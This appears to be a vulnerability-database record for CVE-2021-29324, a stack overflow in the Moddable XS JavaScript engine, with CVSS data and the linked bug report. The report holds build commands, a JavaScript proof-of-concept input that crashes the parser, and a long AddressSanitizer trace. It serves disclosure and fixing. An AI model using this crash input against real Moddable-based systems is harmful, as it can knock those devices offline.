/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.h:#define xsID_OpenSans20 -32071
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.h:#define xsID_OpenSans18 -32070
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.h:#define xsID_OpenSans16 -32041
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/assets.xsb matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/connection-error.xsb matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/login.xsb matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/mc.xsi matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/network-list.xsb matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//resources/OpenSans-Regular-20.fnt matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//resources/OpenSans-Semibold-16.fnt matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//resources/OpenSans-Semibold-18.fnt matches
```
</details> | Wifi-Config example installation issue | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/5/comments | 10 | 2017-12-02T16:10:07Z | 2017-12-06T15:35:11Z | https://github.com/Moddable-OpenSource/moddable/issues/5 | 278,695,069 | 5 | 2,793 |
CVE-2021-29324 | 2021-11-19T17:15:08.073 | OpenSource Moddable v10.5.0 was discovered to contain a stack overflow via the component /moddable/xs/sources/xsScript.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/586"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/Moddable-OpenSource/moddable/issues/586 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | # Enviroment
```
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function getHiddenValue() {
var obj = {};
var oob = '/re/';
oob = oob.replace('', '*'.repeat(1048576));
var str = '[1]' + oob + '}';
var t2 = [
4,
4,
4
];
var fun = eval(str);
var y = 0;
Object.assign(obj, fun);
return obj;
}
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'class x extends Array{}';
var fun = eval(str);
var temp = [];
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var oobString = makeOobString();
```
# description
```
ASAN:SIGSEGV
=================================================================
==5984==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd44d69ff0 (pc 0x7f238c4be26e bp 0x000000000028 sp 0x7ffd44d69fe0 T0)
#0 0x7f238c4be26d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xb026d)
#1 0x7f238c4bdd67 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xafd67)
#2 0x7f238c430f4f (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22f4f)
#3 0x7f238c4a65d2 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x985d2)
#4 0x61189b in fxNewParserChunk /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScript.c:126
#5 0x611994 in fxNewParserChunkClear /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScript.c:137
#6 0x62be05 in fxPushNodeStruct /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:595
#7 0x63703c in fxLiteralExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:2256
#8 0x634d11 in fxCallExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1951
#9 0x634aa1 in fxPostfixExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1938
#10 0x634a86 in fxPrefixExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1933
#11 0x63444b in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1872
#12 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#13 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#14 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#15 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#16 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#17 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#18 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#19 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#20 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#21 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#22 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#23 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#24 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#25 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#26 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#27 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#28 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#29 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#30 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#31 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#32 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#33 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#34 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#35 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#36 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#37 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#38 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#39 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#40 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#41 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#42 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#43 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#44 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#45 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#46 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#47 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#48 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#49 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#50 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#51 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#52 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#53 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#54 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#55 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#56 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#57 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#58 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#59 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#60 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#61 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#62 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#63 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#64 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#65 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#66 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#67 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#68 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#69 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#70 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#71 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#72 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#73 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#74 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#75 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#76 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#77 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#78 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#79 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#80 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#81 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#82 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#83 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#84 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#85 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#86 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#87 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#88 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#89 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#90 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#91 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#92 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#93 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#94 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#95 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#96 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#97 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#98 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#99 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#100 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#101 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#102 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#103 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#104 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#105 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#106 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#107 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#108 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#109 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#110 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#111 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#112 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#113 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#114 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#115 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#116 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#117 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#118 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#119 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#120 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#121 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#122 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#123 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#124 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#125 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#126 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#127 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#128 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#129 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#130 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#131 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#132 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#133 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#134 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#135 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#136 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#137 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#138 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#139 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#140 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#141 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#142 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#143 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#144 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#145 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#146 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#147 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#148 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#149 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#150 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#151 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#152 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#153 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#154 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#155 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#156 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#157 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#158 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#159 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#160 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#161 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#162 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#163 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#164 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#165 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#166 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#167 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#168 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#169 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#170 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#171 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#172 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#173 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#174 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#175 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#176 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#177 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#178 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#179 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#180 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#181 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#182 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#183 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#184 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#185 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#186 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#187 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#188 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#189 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#190 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#191 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#192 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#193 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#194 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
